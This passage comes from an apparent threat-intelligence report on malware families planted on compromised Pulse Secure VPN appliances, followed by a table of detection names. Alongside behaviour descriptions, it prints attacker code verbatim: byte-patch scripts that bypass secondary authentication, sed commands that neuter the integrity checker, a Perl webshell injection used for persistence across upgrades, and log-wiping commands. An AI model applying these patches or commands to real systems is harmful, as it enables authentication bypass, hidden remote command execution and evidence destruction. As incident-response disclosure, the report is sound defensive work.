four arguments. The first argument is the original binary path, the second the patched output file path, third is the backdoor bypass password, and fourth is the letter e specifying to apply patches. The sample reads the original binary into memory, applies the assembly patches associated with SLOWPULSE V3, as well as the provided bypass password, then written to the output path. The assembly patches, and all offsets including where to copy the bypass password are hardcoded.\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 4 Patcher\u003c/h5\u003e\n\u003cp\u003eAs part of our investigation into the SLOWPULSE family we recovered the utility the attacker used to insert the malicious logic into the original\u00a0libdsplibs.so\u00a0file. The file with SHA256:\u00a0e63ab6f82c711e4ecc8f5b36046eb7ea216f41eb90158165b82a6c90560ea415\u00a0responsible for inserting the patch for SLOWPULSE V3. The patch applied overwrites a single call to\u00a0DSAuth::RealmSignin::runSecondaryAuth\u00a0with\u00a0mov eax, 1. This patcher utility is a simple bash script, unlike the previous patchers which were compiled applications likely written in C. The script in full is:\u003c/p\u003e\n\u003cp\u003eprintf '\\xB8' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B31))printf '\\x01' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B32))printf '\\x00' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B33))printf '\\x00' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B34))printf '\\x00' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B35))\u003c/p\u003e\n\u003ch5\u003eSLOWPULSE Variant 4 UnPatcher\u003c/h5\u003e\n\u003cp\u003eAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to remove the malicious logic into the original\u00a0libdsplibs.so\u00a0file for SLOWPULSE V4. The attacker chose to remove the patches applied to\u00a0libdsplibs.so. The file with SHA256:\u00a0b2350954b9484ae4eac42b95fae6edf7a126169d0b93d79f49d36c5e6497062a\u00a0is the unpatcher utility for SLOWPULSE V4. This sample is also a simple bash script, in full it is:\u003c/p\u003e\n\u003cp\u003eprintf '\\xE8' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B31))printf '\\xE2' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B32))printf '\\x08' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B33))printf '\\xD0' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B34))printf '\\xFF' | dd conv\u003dnotrunc of\u003d/home/lib/libdsplibs.so bs\u003d1 count\u003d1 seek\u003d$((0x5C7B35))\u003c/p\u003e\n\u003ch5\u003eSTEADYPULSE\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0licenseserverproto.cgi\u00a0(SHA256:\u00a0168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc) is a webshell implemented via modification of a legitimate Perl script used by a Pulse Secure tool which enables arbitrary command execution.\u003c/p\u003e\n\u003cp\u003eThe attacker inserted two blocks of Perl code that implement the webshell. The source code modifications are surrounded by comments that indicate the start and end of inserted code. The comment strings used are\u00a0##cgistart1,\u00a0##cgiend1,\u00a0##cgistart2\u00a0and\u00a0##cgiend2. Although the exact purpose of these comment strings is unknown, the attacker may use them to facilitate updates to the malicious code or to allow for its quick removal if necessary.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe Perl script enclosed in the tags\u00a0##cgistart1\u00a0and\u00a0##cgiend1\u00a0adds several lines to import Perl modules that are used by the webshell. It also adds a function to parse parameters of received command data.\u003c/li\u003e\n\u003cli\u003eThe script enclosed in the tags\u00a0##cgistart2\u00a0and\u00a0##cgiend2\u00a0is responsible for checking web requests designed to be executed by the webshell, if present. If no webshell request is found, the script passes execution to the legitimate Perl script for the webpage.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe webshell portion of the script is invoked when it receives a form submission\u00a0name\u003dvalue\u00a0pair of\u00a0serverid\u00a0matching a secret key. This causes the webshell to extract the string passed to it via the\u00a0QUERY_STRING\u00a0CGI environment variable. Individual key/value pairs delimited by the\u00a0\u0026amp;\u00a0character and are URL decoded. Although the script parses out all key/value pairs it receives, it specifically looks for and extracts data associated with the cmd parameter. If found, it will generate a form containing the extracted cmd to be executed and the previous\u00a0serverid\u00a0value along with a form submission button named\u00a0Run. Upon submission, the webshell will execute the passed command on the victim host\u0026#39;s command line and display the results to the attacker before exiting. If no cmd value was extracted, the webshell will simply output a\u00a0\u0026lt;/pre\u0026gt;\u00a0HTML tag.\u003c/p\u003e\n\u003ch5\u003ePULSECHECK\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0secid_canceltoken.cgi\u00a0(SHA256:\u00a0a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1) is a webshell written in Perl that enables arbitrary command execution. With a properly formatted request, the script will execute webshell code. Otherwise, the legitimate welcome page of the Pulse Secure VPN software is presumably invoked.\u003c/p\u003e\n\u003cp\u003eThe script checks for web requests using the HTTP\u00a0POST\u00a0method and, if found, will further check the HTTP request headers for the CGI environment variable\u00a0HTTP_X_KEY. If this header matches a backdoor key, then the malware will output the result of the command sent in the variable\u00a0HTTP_X_CMD. This data is RC4 encrypted and base64-encoded. The passphrase to decrypt is sent in the environment variable\u00a0HTTP_X_CNT. The webshell will set the content type to\u00a0Content-type:text/html\u00a0and the command output printed. Following this, the script exits.\u003c/p\u003e\n\u003ch5\u003eQUIETPULSE\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0dsserver\u00a0(SHA256:\u00a09f6ac39707822d243445e30d27b8404466aa69c61119d5308785bf4a464a9ebd) is a legitimate Perl script with malicious modifications to fork the child process\u00a0/home/bin/dshelper. The dshelper script does not exist on a clean PulseSecure installation, this file is described as QUIETPULSE Utility Script.\u003c/p\u003e\n\u003ch5\u003eQUIETPULSE Utility Script\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0dshelper\u00a0(SHA256:\u00a0c774eca633136de35c9d2cd339a3b5d29f00f761657ea2aa438de4f33e4bbba4) is a shell script invoked by a malicious version of\u00a0dsserver\u00a0that primarily functions as a utility script responsible for copying files and executing commands. Like the ATRIUM patcher, this script accesses /tmp/data, a path which is used during a system upgrade. This file is therefore, like the ATRIUM patcher, used by the attacker to maintain persistence. The script is set to execute in a loop where four main checks are executed every two minutes. The checks are as follows:\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eCheck 1\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIf\u00a0/tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u00a0exists and is non-empty then execute:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003egrep -c -s 'system($depara)' /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIt checks if the file has the contents\u00a0system($depara). If the file does not contain this content, then retrieve the first line of the file by executing:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esed -n 1p /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThen copy a file via:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ecp /home/webserver/htdocs/dana-na/auth/compcheckjava.cgi /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThen replace the copy\u2019s first line with the one retrieved from the sed above via:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esed -i 1c\u0026quot;\u0026lt;varies\u0026gt;\u0026quot; /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cem\u003eCheck 2\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIf\u00a0/tmp/data/root/home/bin/\u00a0exists as a directory, then check if the file\u00a0/tmp/data/root/home/bin/dshelper\u00a0does not exist. If it does not exist, then place it there by copying a file via:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ecp -p /home/bin/dshelper /tmp/data/root/home/bin/\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cem\u003eCheck 3\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIf\u00a0/tmp/data/root/home/bin/dsserver\u00a0exists and is non-empty then execute the following to check if the file does not contain the string\u00a0exec(\"/home/bin/dshelper\"):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003egrep -c -s 'exec(\"/home/bin/dshelper\")' /tmp/data/root/home/bin/dsserver\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIf it doesn't then execute to insert the line:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esed -i \u0026#39;s/for (;;)/my $monpid \u003d fork();\\nif ($monpid \u003d\u003d 0) {\\nexec(\\\u0026quot;\\/home\\/bin\\/dshelper\\\u0026quot;);\\n}\\n\u0026amp;/g\u0026#39; /tmp/data/root/home/bin/dsserver\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cem\u003eCheck 4\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eIf the file\u00a0/tmp/data/root/home/bin/check_integrity.sh\u00a0exists and is non-empty, then check if the file contains the string\u00a0exit 1\u00a0by executing:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003egrep -c -s 'exit 1' /tmp/data/root/home/bin/check_integrity.sh\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIf the file does contain this content, then execute the following to switch the content to\u00a0exit 0:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esed -i 's/exit 1/exit 0/g' /tmp/data/root/home/bin/check_integrity.sh\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch5\u003ePULSEJUMP\u003c/h5\u003e\n\u003cp\u003eThe file with SHA256:\u00a07fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a\u00a0is a system information and credential harvesting Perl script. The sample writes information from multiple sources to the file\u00a0/tmp/dsactiveuser.statementcounters\u00a0in append mode.\u003c/p\u003e\n\u003cp\u003eThe sample begins by retrieving all auth servers via the API\u00a0AuthAdmin::getAllAuthServers. and logs the results. Next, the sample logs all roles via the API\u00a0DSRole::GeneralAdmin::getRoles\u00a0and writes the values to the file. The sample may also retrieve and log additional information depending on the device configuration.\u003c/p\u003e\n\u003ch5\u003eHARDPULSE\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0compcheckjava.cgi\u00a0(SHA256:\u00a01d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc) has the ability to read and write arbitrary files and may execute arbitrary commands depending on the implementation of a particular library function.\u003c/p\u003e\n\u003cp\u003eThe sample responds to HTTP GETs and PUTs. The GET path is not relevant, but the PUT path first checks if the incoming requests\u00a0checkcode\u00a0POST param is equal to a hardcoded passcode. If this check passes the sample inspects the param\u00a0hashid\u00a0to determine if it\u0026#39;s non-empty. If non-empty the sample displays a prompt to the user that includes hardware information and then base64 decodes the param\u00a0hashid\u00a0and checks it against pulsesecure. If this matches a recoveryToken is generated which is the MD5 hash of 16 random bytes, with the result hash truncated to 8 characters. This token is then displayed to the user via the URL\u00a0https://ive-host/dana-na/auth/recover[.]cgi?token\u003d\u0026lt;varies\u0026gt;\u00a0and the sample exits. If this check did not match then the sample passes the base64 decoded data to a routine\u00a0DSSafe::psystem\u00a0which may execute shell commands, however this implementation is not provided and is speculation.\u003c/p\u003e\n\u003cp\u003eIf the param hashid is empty the sample instead checks that the param\u00a0m\u00a0is non-empty. If so, it's matched against get and put which will read/write arbitrary files to the host, respectively.\u003c/p\u003e\n\u003ch5\u003eATRIUM\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0compcheckresult.cgi\u00a0(SHA256:\u00a0f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90) is a webshell capable of arbitrary command execution. The sample has malicious logic inserted at the end of legitimate logic. The malicious logic inspects all requests of any type looking for the HTTP query parameter\u00a0id. If this query parameter exists, the sample executes it verbatim on using the\u00a0system\u00a0API. The sample does not encode or obfuscate the command in any way. If the query parameter is not found in the request, then the original legitimate logic is invoked.\u003c/p\u003e\n\u003ch5\u003ePersistence Patcher\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0DSUpgrade.pm\u00a0(SHA256:\u00a0224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450) is a patcher utility script responsible for persisting webshells across a system upgrade. We\u2019ve observed variants of this utility targeting the persistence of multiple webshell families, notably ATRIUM, STEADYPULSE, and PULSECHECK. Like previous patchers, this sample uses\u00a0sed\u00a0to insert malicious logic. The attacker likely chose\u00a0DSUpgade.pm\u00a0to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is during updates. The patcher modifies content in\u00a0/tmp/data\u00a0as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a persistence mechanism which allows the attacker to maintain access to the system across updates.\u003c/p\u003e\n\u003cp\u003emy $cmd_x\u003d\u0026quot;sed -i \u0026#39;/echo_console \\\u0026quot;Saving package\\\u0026quot;/i(\u00a0 \u00a0 sed -i \\\\\\\u0026#39;/main();\\\\\\$/cif(CGI::param(\\\\\\\\\\\u0026quot;id\\\\\\\\\\\u0026quot;)){\u00a0 \u00a0 \u00a0 \u00a0 print \\\\\\\\\\\u0026quot;Cache-Control: no-cache\\\\\\\\\\\\\\\\n\\\\\\\\\\\u0026quot;;\u00a0 \u00a0 \u00a0 \u00a0 print \\\\\\\\\\\u0026quot;Content-type: text/html\\\\\\\\\\\\\\\\n\\\\\\\\\\\\\\\\n\\\\\\\\\\\u0026quot;;\u00a0 \u00a0 \u00a0 \u00a0 my \\\\\\\\\\$na\u003dCGI::param(\\\\\\\\\\\u0026quot;id\\\\\\\\\\\u0026quot;);\u00a0 \u00a0 \u00a0 \u00a0 system(\\\\\\\\\\\u0026quot;\\\\\\\\\\$na\\\\\\\u0026quot;);\u00a0 \u00a0 } else{\u00a0 \u00a0 \u00a0 \u00a0 \u0026amp;main();\u00a0 \u00a0 }\\\\\\\u0026#39; /tmp/data/root$cgi_p;\u00a0 \u00a0 cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;\u00a0 \u00a0 cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)\u0026#39;/pkg/do-install\u0026quot;;\u003c/p\u003e\n\u003cp\u003eThe patcher also performs additional shell commands for unpacking a compressed package:\u003c/p\u003e\n\u003cp\u003esystem(\"/bin/mount -o remount,rw /dev/root /\");system(\"/bin/tar\", \"-xzf\", \"/tmp/new-pack.tgz\", \"-C\", \"/tmp\",\"./installer\");system(\"cp -f /tmp/installer/do-install /pkg/\");system(\"cp -f /tmp/installer/VERSION /pkg/\");system(\"cp -f /tmp/installer/sysboot-shlib /pkg/\");system(\"cp -f /tmp/installer/losetup /pkg/\");\u003c/p\u003e\n\u003ch5\u003ePACEMAKER\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0memread\u00a0(SHA256:\u00a068743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2) is a credential stealer. The sample has the usage information:\u003c/p\u003e\n\u003cp\u003eUsage: memread [-t time(minute)] [-m size(MB)] [-s sleep_interval(second)]\u003c/p\u003e\n\u003cp\u003eThe sample starts by setting an alarm that kills the application after a configurable number of minutes, 14 by default. It then enters a loop which reads\u00a0/proc/\u00a0entries every 2 seconds looking for a target application, this interval is also configurable. The target is found by opening\u00a0/proc/\u0026lt;process_name\u0026gt;/cmdline\u00a0for each entry in the folder and then reading this file looking for the string\u00a0dswsd\u00a0within the command line. Once found the target application\u0026#39;s\u00a0proc/\u0026lt;target_pid\u0026gt;/mem\u00a0is opened, the process is attached to with PTRACE, then memory read in chunks up to 512 bytes in size. For each chunk, the string\u00a020 30 20 0A 00 ( 0 \\n)\u00a0is searched for as a needle. If found the sample splits the data by first space, then a dash -. Two dashes are expected to be found, and these are immediately converted into hex numbers, example form: -\u0026lt;number\u0026gt;. If the second number minus the first is \u0026gt; 8191 the sample reads the data starting at the file offset of the first number, up to a size specified by second number minus first number.\u003c/p\u003e\n\u003cp\u003eOnce the sample has read the process memory and found all memory data of interest the sample detaches PTRACE then the sample begins memory scanning the copied data. The sample tries to locate a sequence of 'flags' in memory one by one to locate what seem to be information the attacker wishes to steal. This information is not known, nor is the structure of it. The sequences scanned for generally have start and end scan sequences which in order scanned for, are:\u003c/p\u003e\n\u003cp\u003eUSER_START_FLAG: 3C 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 05 00USER_END_FLAG: 3C 2F 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 00PASSWORD_START_FLAG: 3C 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00PASSWORD_END_FLAG: 3C 2F 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00AUTHNUM_START_FLAG: 3C 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00AUTHNUM_END_FLAG: 3C 2F 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00\u003c/p\u003e\n\u003cp\u003eIf all these sequences are found, the data between the start and end is extracted and eventually formatted and written to the file\u00a0/tmp/dsserver-check.statementcounters. The approximate format of this data is:\u003c/p\u003e\n\u003cp\u003eName:\u0026lt;username\u0026gt; || Pwd:\u0026lt;password\u0026gt; || AuthNum:\u0026lt;authnumber\u0026gt;\\n\u003c/p\u003e\n\u003cp\u003eThe sample replaces the following URL encoded values with their ascii representation for the password:\u003c/p\u003e\n\u003cp\u003e\u0026amp;amp; -\u0026gt;\u00a0 \u0026amp;\u0026amp;lt;\u00a0 -\u0026gt;\u00a0 \u0026lt;\u0026amp;gt;\u00a0 -\u0026gt;\u00a0 \u0026gt;\u003c/p\u003e\n\u003ch5\u003ePACEMAKER Launcher Utility\u003c/h5\u003e\n\u003cp\u003eAs part of our investigation into PACEMAKER we were able to retrieve a simple bash script responsible for launching the credential stealer. The launcher script hash SHA256\u00a04c5555955b2e6dc55f52b0c1a3326f3d07b325b112060329c503b294208960ec\u00a0launches PACEMAKER from a hardcoded path with options specifying a 16MB memory read size and a memory scan interval of 2 seconds, with a variable self-kill time.\u003c/p\u003e\n\u003cp\u003e#!/bin/bash\u003c/p\u003e\n\u003cp\u003e/home/bin/memread -t $1 -m 16 -s 2 \u0026amp;\u003c/p\u003e\n\u003ch5\u003eTHINBLOOD Log Wiper Utility\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0dsclslog\u00a0with SHA256\u00a088170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079\u00a0is a log wiper utility. The sample provides the usage information:\u003c/p\u003e\n\u003cp\u003eUsage: dsclslog -f [events|access] -r [Regex1,Regex2,Regex3,...]\u003c/p\u003e\n\u003cp\u003eThe\u00a0\u2013f\u00a0flag specifies if the file\u00a0log.events.vc0\u00a0or\u00a0log.access.vc0\u00a0within the directory\u00a0/home/runtime/logs\u00a0should be modified. To perform its log cleaning operations the sample first makes two copies of whichever log file was chosen, but uses\u00a0.vc1\u00a0and\u00a0.vc2\u00a0as the extension for the new files. The file with the\u00a0.vc1\u00a0is used to search for entries that match the given entries, and the file with the\u00a0.vc2\u00a0extension is used as a temporary file where the cleaned log is written. After generating both files and log cleaning is finished the sample executes the following commands via the system API to overwrite the original log with the cleaned version, then removes the intermediate:\u003c/p\u003e\n\u003cp\u003emv /home/runtime/logs/log.\u0026lt;logtype\u0026gt;.vc2/home/runtime/logs/log.\u0026lt;logtype\u0026gt;.vc0rm /home/runtime/logs/log.\u0026lt;logtype\u0026gt;.vc1\u003c/p\u003e\n\u003ch5\u003eTHINBLOOD LogWiper Utility Variant\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0clear_log.sh\u00a0(SHA256:\u00a01741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9) is a BASH script responsible for zeroing log lines that match a given regex pattern. The sample is similar to the compiled\u00a0THINBLOOD\u00a0Log Wiper but edits logs in-place with sed rather than making temporary copies. The sed commands used are:\u003c/p\u003e\n\u003cp\u003esed -i \u0026quot;s/.\\x00[^\\x00]*\u0026lt;regex_string\u0026gt;[^\\x00]*\\x09.\\x00//g\u0026quot; /data/runtime/logs/\u0026lt;logfile\u0026gt;\u003c/p\u003e\n\u003cp\u003esed -i \u0026quot;s/\\x\u0026lt;hex_char\u0026gt;\\x00[^\\x00]*$2[^\\x00]*\\x09\\x\u0026lt;hex_char\u0026gt;\\x00//g\u0026quot; /data/runtime/logs/\u0026lt;logfile\u0026gt;\u003c/p\u003e\n\u003cp\u003eThe sample embeds the usage information:\u003c/p\u003e\n\u003cp\u003eusage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]\u003c/p\u003e\n\u003ch5\u003eLOCKPICK\u003c/h5\u003e\n\u003cp\u003eThe file\u00a0libcrypto.so\u00a0(SHA256:\u00a02610d0372e0e107053bc001d278ef71f08562e5610691f18b978123c499a74d8) is a shared object containing cryptographic logic from openssl. The sample contains a modification to the routine\u00a0bnrand_range\u00a0that breaks the security of the random numbers generated. There are three paths in this routine for generating a random big number between a given range. The first case is unmodified and generates a zeroed big number, the other two cases are patched so that a constant value overwrites the generated random value and always returns success. This breaks the random number generation by replacing it with a value the attacker knows in all cases.\u003c/p\u003e\n\u003ch5\u003eLOCKPICK Patcher\u003c/h5\u003e\n\u003cp\u003eThe file with the hash\u00a0b990f79ce80c24625c97810cb8f161eafdcb10f1b8d9d538df4ca9be387c35e4\u00a0is a patcher utility responsible for inserting the malicious logic known as LOCKPICK. The patcher starts by running sed on the integrity checker script built into the appliance to insert an early exit routine. This is inserted by the command\u00a0sed -i '12aexit 0' /home/bin/check_integrity.sh\u00a0which when applied causes this script to exit without performing its intended checks. After this the sample uses python file read/write APIs to insert long strings of assembly that represent the logic known as LOCKPICK. This file is different from the other patchers we\u2019ve identified in that it is python and specifically targets system integrity routines.\u003c/p\u003e\n\u003ch4\u003eDetecting the Techniques\u003c/h4\u003e\n\u003cp\u003eThe following table contains specific FireEye product detection names for the malware families associated with the exploitation of Pulse Secure VPN device.\u003c/p\u003e\n\u003cp\u003e\u00a0\u003c/p\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u003ctable border\u003d\"1\" style\u003d\"border-collapse:collapse;width:100%\"\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:6.72632%\"\u003e\n\u003cp\u003e\u003cstrong\u003ePlatform(s)\u00a0\u003c/strong\u003e\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:93.2945%\"\u003e\n\u003cp\u003e\u003cstrong\u003eDetection Name\u00a0\u003c/strong\u003e\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:6.72632%\"\u003e\n\u003cp\u003eNetwork Security\u00a0\u003c/p\u003e\n\u003cp\u003eEmail Security\u00a0\u003c/p\u003e\n\u003cp\u003eDetection\u00a0On\u00a0Demand\u00a0\u003c/p\u003e\n\u003cp\u003eMalware\u00a0File Scanning\u00a0\u003c/p\u003e\n\u003cp\u003eMalware\u00a0File\u00a0Storage Scanning\u00a0\u003c/p\u003e\n\u003cp\u003e\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:93.2945%\"\u003e\n\u003cp\u003eFE_APT_Webshell_PL_HARDPULSE_1FEC_APT_Webshell_PL_HARDPULSE_1APT.Webshell.PL.HARDPULSE\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_PL_PULSEJUMP_1FEC_APT_Trojan_PL_PULSEJUMP_1FE_Trojan_PL_Generic_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_PL_RADIALPULSE_1FEC_APT_Trojan_PL_RADIALPULSE_1FE_APT_Trojan_PL_RADIALPULSE_2FE_APT_Trojan_PL_RADIALPULSE_3FEC_APT_Trojan_PL_RADIALPULSE_2FE_APT_Trojan_PL_RADIALPULSE_4FEC_APT_Trojan_PL_RADIALPULSE_3FE_APT_Trojan_PL_RADIALPULSE_5FE_APT_Tool_SH_RADIALPULSE_1FEC_APT_Tool_SH_RADIALPULSE_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_Linux32_PACEMAKER_1FE_APT_Trojan_Linux_PACEMAKER_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Backdoor_Linux32_SLOWPULSE_1FE_APT_Backdoor_Linux32_SLOWPULSE_2\u00a0FE_APT_Trojan_Linux32_SLOWPULSE_1\u00a0FE_APT_Tool_Linux32_SLOWPULSE_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Webshell_PL_STEADYPULSE_1\u00a0FEC_APT_Webshell_PL_STEADYPULSE_1\u00a0APT.Webshell.PL.STEADYPULSE\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_Linux32_LOCKPICK_1\u003c/p\u003e\n\u003cp\u003eFE_Webshell_PL_ATRIUM_1\u00a0FEC_Webshell_PL_ATRIUM_1FE_Trojan_SH_ATRIUM_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Webshell_PL_SLIGHTPULSE_1FEC_APT_Webshell_PL_SLIGHTPULSE_1APT.Webshell.PL.SLIGHTPULSE\u003c/p\u003e\n\u003cp\u003eFE_APT_Webshell_PL_PULSECHECK_1FEC_APT_Webshell_PL_PULSECHECK_1\u003c/p\u003e\n\u003cp\u003eFE_APT_Tool_Linux32_THINBLOOD_1\u00a0FE_APT_Tool_Linux_THINBLOOD_1\u00a0 \u00a0 \u00a0\u00a0FE_APT_Tool_SH_THINBLOOD_1\u00a0FEC_APT_Tool_SH_THINBLOOD_1APT.Tool.Linux.THINBLOOD.MVX\u003c/p\u003e\n\u003cp\u003eFE_APT_Trojan_PL_QUIETPULSE_1FEC_APT_Trojan_PL_QUIETPULSE_1\u00a0FE_Trojan_SH_Generic_2\u00a0FEC_Trojan_SH_Generic_3\u003c/p\u003e\n\u003cp\u003eSuspicious Pulse Secure HTTP request (IPS)\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:6.72632%\"\u003e\n\u003cp\u003eEndpoint Security\u00a0\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:93.2945%\"\u003e\n\u003cp\u003eReal-Time (IOC)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSLOWPULSE (BACKDOOR)\u003c/li\u003e\n\u003cli\u003ePACEMAKER (LAUNCHER)\u003c/li\u003e\n\u003cli\u003eTHINBLOOD (UTILITY)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd style\u003d\"width:6.72632%\"\u003e\n\u003cp\u003eHelix\u003c/p\u003e\n\u003c/td\u003e\n\u003ctd style\u003d\"width:93.2945%\"\u003e\n\u003cp\u003eVPN ANALYTICS [Abnormal Logon]EXPLOIT - SONICWALL ES [CVE-2021-20021 Attempt]\u00a0EXPLOIT - SONICWALL ES [CVE-2021-20021 Success]EXPLOIT - SONICWALL ES [CVE-2021-20023 Attempt]EXPLOIT - SONICWALL ES [CVE-2021-20023 Success]\u003c/p\u003e\n\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003c/div\u003e\n\u003ch4\u003eMandiant Security Validation Actions\u003c/h4\u003e\n\u003cp\u003eOrganizations can validate their security controls using the following actions with\u00a0\u003ca href\u003d\"https://www.mandiant.com/advantage/security-validation\" rel\u003d\"noopener\" target\u003d\"_blank\" title\u003d\"https://www.fireeye.com/mandiant/security-validation.html\"\u003eMandiant Security Validation\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u00a0\u003c/p\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\n\u003cdiv style\u003d\"color:#5f6368;overflow-x:auto;overflow-y:hidden;width:100%\"\u003e\u003ctable border\u003d\"1\" style\u003d\"border-collapse:collapse;width:100%\"\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd 